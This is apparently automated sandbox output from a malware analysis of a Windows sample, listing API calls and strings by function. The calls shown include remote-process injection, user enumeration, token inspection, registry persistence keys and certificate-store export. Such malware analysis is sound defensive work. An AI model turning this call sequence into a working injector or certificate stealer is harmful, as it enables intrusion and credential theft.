WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00412FF7
CloseHandle.KERNEL32(0000000C), ref: 0041300D
CloseHandle.KERNEL32(?), ref: 00413013
CloseHandle.KERNEL32(?), ref: 00413016

Part of subcall function 00416B8E: ReleaseMutex.KERNEL32(00000000,00413021,?,?,?), ref: 00416B92

Part of subcall function 0041D0E6: LoadLibraryW.KERNEL32(?), ref: 0041D107
Part of subcall function 0041D0E6: GetProcAddress.KERNEL32(00000000,?), ref: 0041D128
Part of subcall function 0041D0E6: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0041D159
Part of subcall function 0041D0E6: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0041D17C
Part of subcall function 0041D0E6: FreeLibrary.KERNEL32(00000000), ref: 0041D1A3
Part of subcall function 0041D0E6: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 0041D1D9
Part of subcall function 0041D0E6: NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0041D212
Part of subcall function 0041D0E6: NetApiBufferFree.NETAPI32(?,?,?), ref: 0041D2AB
Part of subcall function 0041D0E6: NetApiBufferFree.NETAPI32(?), ref: 0041D2BE
Part of subcall function 0041D0E6: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0041D2E2

Part of subcall function 00414E20: CharToOemW.USER32(?,?), ref: 00414E35

Part of subcall function 00416B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,00412E87,?,19367401,?,00000001,8889347B,00000002), ref: 00416BA9
Part of subcall function 00416B9E: CloseHandle.KERNEL32(00000000), ref: 00416BB4

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 00412507: CreateMutexW.KERNEL32(00422C30,00000000,?,?,?,?,?), ref: 00412528

Part of subcall function 0041CCCF: StrCmpNIW.SHLWAPI(C:\Users\admin\AppData\Roaming,0123F800,00000000), ref: 0041CD57
Part of subcall function 0041CCCF: lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 0041CD6F

Strings

, xrefs: 00412DD7
C:\Users\admin\AppData\Roaming, xrefs: 00412F35, 00412F6C, 00412F94
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 00412F08

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00413048, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 138

APIs

Part of subcall function 004120C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00412105
Part of subcall function 004120C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 004121DB
Part of subcall function 004120C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 004121FA
Part of subcall function 004120C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 0041220C
Part of subcall function 004120C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 0041221E
Part of subcall function 004120C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 00412230
Part of subcall function 004120C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 00412242
Part of subcall function 004120C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 00412254
Part of subcall function 004120C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 0041228D
Part of subcall function 004120C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 0041229C
Part of subcall function 004120C4: InitializeCriticalSection.KERNEL32(0042400C,?,?,00000000), ref: 004122C9
Part of subcall function 004120C4: WSAStartup.WS2_32(00000202,?), ref: 004122DF
Part of subcall function 004120C4: CreateEventW.KERNEL32(00422C30,00000001,00000000,00000000,?,?,00000000), ref: 00412300
Part of subcall function 004120C4: GetLengthSid.ADVAPI32(00000000,000000FF,00422C08,?,?,00000000), ref: 00412335
Part of subcall function 004120C4: GetCurrentProcessId.KERNEL32(00000000,0123F7D0,00000000,?,?,00000000), ref: 00412362

SetErrorMode.KERNELBASE(00008007,00000000), ref: 0041306F
GetCommandLineW.KERNEL32(?), ref: 00413079
CommandLineToArgvW.SHELL32(00000000), ref: 00413080
LocalFree.KERNEL32(00000000), ref: 004130D5

Part of subcall function 0040E0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0040E108
Part of subcall function 0040E0FB: GetThreadDesktop.USER32(00000000), ref: 0040E10F
Part of subcall function 0040E0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0040E128

Part of subcall function 00405BF6: GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,004130F6), ref: 00405C03
Part of subcall function 00405BF6: SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,004130F6), ref: 00405C0A
Part of subcall function 00405BF6: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,004130F6), ref: 00405C1C
Part of subcall function 00405BF6: SetEvent.KERNEL32(00422868,?,00000001), ref: 00405C69
Part of subcall function 00405BF6: GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00405C76

Part of subcall function 0040DF74: DeleteObject.GDI32(00000000), ref: 0040DF87
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DF97
Part of subcall function 0040DF74: TlsFree.KERNEL32(00000000,00000000,00422868,00000000,0040E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DFA2
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DFB0
Part of subcall function 0040DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,00422868,00000000,0040E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DFBA
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DFC7
Part of subcall function 0040DF74: SelectObject.GDI32(00000000,00000000), ref: 0040DFE1
Part of subcall function 0040DF74: DeleteObject.GDI32(00000000), ref: 0040DFF2
Part of subcall function 0040DF74: DeleteDC.GDI32(00000000), ref: 0040DFFF
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040E010
Part of subcall function 0040DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040E01F
Part of subcall function 0040DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0040E038

Part of subcall function 00412B08: GetModuleHandleW.KERNEL32(?), ref: 00412B1F
Part of subcall function 00412B08: GetProcAddress.KERNEL32(00000000,?), ref: 00412B41

Part of subcall function 00412D01: CreateMutexW.KERNELBASE(00422C30,00000001,?,32901130,?,00000001,?), ref: 00412D91
Part of subcall function 00412D01: GetLastError.KERNEL32 ref: 00412DA3
Part of subcall function 00412D01: CloseHandle.KERNEL32(000001E6), ref: 00412DBA
Part of subcall function 00412D01: ExitWindowsEx.USER32(00000014,80000000), ref: 00412DFD
Part of subcall function 00412D01: OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 00412E1C
Part of subcall function 00412D01: SetEvent.KERNEL32(00000000), ref: 00412E29
Part of subcall function 00412D01: CloseHandle.KERNEL32(00000000), ref: 00412E30
Part of subcall function 00412D01: CloseHandle.KERNEL32(000001E6), ref: 00412E42
Part of subcall function 00412D01: ReadProcessMemory.KERNEL32(000000FF,76C55F4D,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 00412EA6
Part of subcall function 00412D01: Sleep.KERNEL32(000001F4), ref: 00412EB8
Part of subcall function 00412D01: IsWellKnownSid.ADVAPI32(0123F7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 00412EC9
Part of subcall function 00412D01: ReadProcessMemory.KERNEL32(000000FF,76C55F4D,00000000,00000001,00000000), ref: 00412EF1
Part of subcall function 00412D01: GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 00412F0D
Part of subcall function 00412D01: VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 00412F50
Part of subcall function 00412D01: CreateEventW.KERNEL32(00422C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 00412FCE
Part of subcall function 00412D01: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00412FE7
Part of subcall function 00412D01: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00412FF7
Part of subcall function 00412D01: CloseHandle.KERNEL32(0000000C), ref: 0041300D
Part of subcall function 00412D01: CloseHandle.KERNEL32(?), ref: 00413013
Part of subcall function 00412D01: CloseHandle.KERNEL32(?), ref: 00413016

Sleep.KERNEL32(000000FF,?,00000001), ref: 0041312B
ExitProcess.KERNEL32(00000000,00000000), ref: 0041313C
OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 00413157

Part of subcall function 00412542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 00412574
Part of subcall function 00412542: WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,0041316D,?,00000000,?,?,00000000), ref: 004125AB
Part of subcall function 00412542: WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,0041316D,?,00000000,?,?,00000000), ref: 004125CB
Part of subcall function 00412542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,0041316D,?,00000000), ref: 0041261A

CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00835903,00000000,00000000,00000000), ref: 00413185
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00413198
CloseHandle.KERNEL32(?), ref: 004131A1
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 004131B5
CloseHandle.KERNEL32(00000000), ref: 004131BC

Strings

h(B, xrefs: 00413103

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004169AA, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57

APIs

InitializeSecurityDescriptor.ADVAPI32(00422C3C,00000001,00000000,004122ED,?,?,00000000), ref: 004169B4
SetSecurityDescriptorDacl.ADVAPI32(00422C3C,00000001,00000000,00000000,?,?,00000000), ref: 004169C5
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 004169DB
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 004169F7
SetSecurityDescriptorSacl.ADVAPI32(00422C3C,?,?,?,?,?,00000000), ref: 00416A0B
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 00416A18

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 004169D6

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004131CC, Relevance: 12.1, APIs: 8, Instructions: 114

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004131ED
Process32FirstW.KERNEL32(000001E6,?), ref: 00413216

Part of subcall function 0041245B: CreateMutexW.KERNELBASE(00422C30,00000001,?,00422E70,76C605D7,?,00000002,?,76C605D7), ref: 004124A3
Part of subcall function 0041245B: GetLastError.KERNEL32 ref: 004124AF
Part of subcall function 0041245B: CloseHandle.KERNEL32(00000000), ref: 004124BD

OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 00413271
CloseHandle.KERNEL32(?), ref: 0041330E

Part of subcall function 004149D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,00412326,000000FF,00422C08,?,?,00000000), ref: 004149E2
Part of subcall function 004149D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,00412326,000000FF,00422C08), ref: 00414A0E
Part of subcall function 004149D2: CloseHandle.KERNEL32(?), ref: 00414A23

CloseHandle.KERNEL32(00000000), ref: 0041328E
GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 004132A1

Part of subcall function 00413346: HeapAlloc.KERNEL32(00000008,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?,?), ref: 00413368
Part of subcall function 00413346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?), ref: 00413379

Part of subcall function 00413048: OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 00413157
Part of subcall function 00413048: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00835903,00000000,00000000,00000000), ref: 00413185
Part of subcall function 00413048: WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00413198
Part of subcall function 00413048: CloseHandle.KERNEL32(?), ref: 004131A1
Part of subcall function 00413048: VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 004131B5
Part of subcall function 00413048: CloseHandle.KERNEL32(00000000), ref: 004131BC

Process32NextW.KERNEL32(000001E6,0000022C), ref: 0041331A
CloseHandle.KERNEL32(000001E6), ref: 0041332B

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00414B0F, Relevance: 10.6, APIs: 7, Instructions: 74

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 00414B1F
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,76C61857,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 00414B3F
GetLastError.KERNEL32(?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 00414B45

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 00414B6C
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 00414B74
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 00414B8B

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

CloseHandle.KERNEL32(?), ref: 00414BB6

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041795E, Relevance: 10.6, APIs: 7, Instructions: 65

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 0041797D
PathAddBackslashW.SHLWAPI(?), ref: 00417994
PathRemoveBackslashW.SHLWAPI(?), ref: 004179A5
PathRemoveFileSpecW.SHLWAPI(?), ref: 004179B2
PathAddBackslashW.SHLWAPI(?), ref: 004179C3
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 004179D2
CLSIDFromString.OLE32(?,?), ref: 004179EC

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004185D0, Relevance: 9.1, APIs: 6, Instructions: 68

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 004185F5
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00412D27,?,?,00000000), ref: 00418608
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,00412D27,?,?,00000000), ref: 00418630
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00418648
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00412D27,?,?,00000000), ref: 00418662
CloseHandle.KERNEL32(?), ref: 0041866B

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041768E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54

APIs

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 004176B3

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

RegQueryValueExW.ADVAPI32(?,000000FF,00000000,?,00000000,00000000), ref: 004176E2

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

RegCloseKey.KERNEL32(?), ref: 00417702

Strings

SOFTWARE\Microsoft\Xyuxy, xrefs: 00417699

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00411E2D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 00411E4B
PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 00411E5A
GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 00411E6E

Strings

C:\Users\admin\AppData\Roaming, xrefs: 00411E3D, 00411E42, 00411E59

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00417D14, Relevance: 6.1, APIs: 4, Instructions: 94

APIs

IsBadReadPtr.KERNEL32(00400000,?), ref: 00417D30
VirtualAllocEx.KERNELBASE(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 00417D4E
WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000,00400000,?,?,00000000,?,00000000), ref: 00417DE0

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

VirtualFreeEx.KERNEL32(?,?,00000000,00008000,00400000,?,?,00000000,?,00000000), ref: 00417E05

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00412542, Relevance: 6.1, APIs: 4, Instructions: 87

APIs

Part of subcall function 00417D14: IsBadReadPtr.KERNEL32(00400000,?), ref: 00417D30
Part of subcall function 00417D14: VirtualAllocEx.KERNELBASE(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 00417D4E
Part of subcall function 00417D14: WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000,00400000,?,?,00000000,?,00000000), ref: 00417DE0
Part of subcall function 00417D14: VirtualFreeEx.KERNEL32(?,?,00000000,00008000,00400000,?,?,00000000,?,00000000), ref: 00417E05

DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 00412574
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,0041316D,?,00000000,?,?,00000000), ref: 004125AB
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,0041316D,?,00000000,?,?,00000000), ref: 004125CB

Part of subcall function 00411D15: DuplicateHandle.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,00000002), ref: 00411D3B
Part of subcall function 00411D15: WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,00000000,?,00000000,?,004125E9,00000000,?,?,?,?,0041316D,?), ref: 00411D4F
Part of subcall function 00411D15: DuplicateHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00411D69

VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,0041316D,?,00000000), ref: 0041261A

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040E89E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0040E8E0

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 0041768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 004176B3
Part of subcall function 0041768E: RegQueryValueExW.ADVAPI32(?,000000FF,00000000,?,00000000,00000000), ref: 004176E2
Part of subcall function 0041768E: RegCloseKey.KERNEL32(?), ref: 00417702

Strings

Qanyodfyy, xrefs: 0040E8B7, 0040E8F2
SOFTWARE\Microsoft\Xyuxy, xrefs: 0040E8A7, 0040E8B2, 0040E8BE, 0040E8D9

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00411D15, Relevance: 4.5, APIs: 3, Instructions: 46

APIs

DuplicateHandle.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,00000002), ref: 00411D3B
WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,00000000,?,00000000,?,004125E9,00000000,?,?,?,?,0041316D,?), ref: 00411D4F
DuplicateHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00411D69

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00416AAA, Relevance: 4.5, APIs: 3, Instructions: 41

APIs

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,004149F4,?,?,?,00412326,000000FF,00422C08), ref: 00416AC3
GetLastError.KERNEL32(?,?,004149F4,?,?,?,00412326,000000FF,00422C08,?,?,00000000), ref: 00416AC9

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,00000000,?,?,004149F4,?,?,?,00412326,000000FF,00422C08), ref: 00416AEF

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004149D2, Relevance: 4.5, APIs: 3, Instructions: 37

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,00412326,000000FF,00422C08,?,?,00000000), ref: 004149E2

Part of subcall function 00416AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,004149F4,?,?,?,00412326,000000FF,00422C08), ref: 00416AC3
Part of subcall function 00416AAA: GetLastError.KERNEL32(?,?,004149F4,?,?,?,00412326,000000FF,00422C08,?,?,00000000), ref: 00416AC9
Part of subcall function 00416AAA: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,00000000,?,?,004149F4,?,?,?,00412326,000000FF,00422C08), ref: 00416AEF

GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,00412326,000000FF,00422C08), ref: 00414A0E

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

CloseHandle.KERNEL32(?), ref: 00414A23

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041245B, Relevance: 4.5, APIs: 3, Instructions: 35

APIs

Part of subcall function 00417A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 00417AB5

CreateMutexW.KERNELBASE(00422C30,00000001,?,00422E70,76C605D7,?,00000002,?,76C605D7), ref: 004124A3
GetLastError.KERNEL32 ref: 004124AF
CloseHandle.KERNEL32(00000000), ref: 004124BD

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00418678, Relevance: 2.5, APIs: 2, Instructions: 16

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,0041C83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 00418689
CloseHandle.KERNEL32(?), ref: 00418697

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Non-executed Functions

Function 0041D486, Relevance: 12.1, APIs: 8, Instructions: 119

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00404BBC,?,00000000,00000001), ref: 0041D4A1
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 0041D4BD
CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 0041D4C9
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 0041D508

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 0041D538
CharLowerW.USER32 ref: 0041D556
GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 0041D561

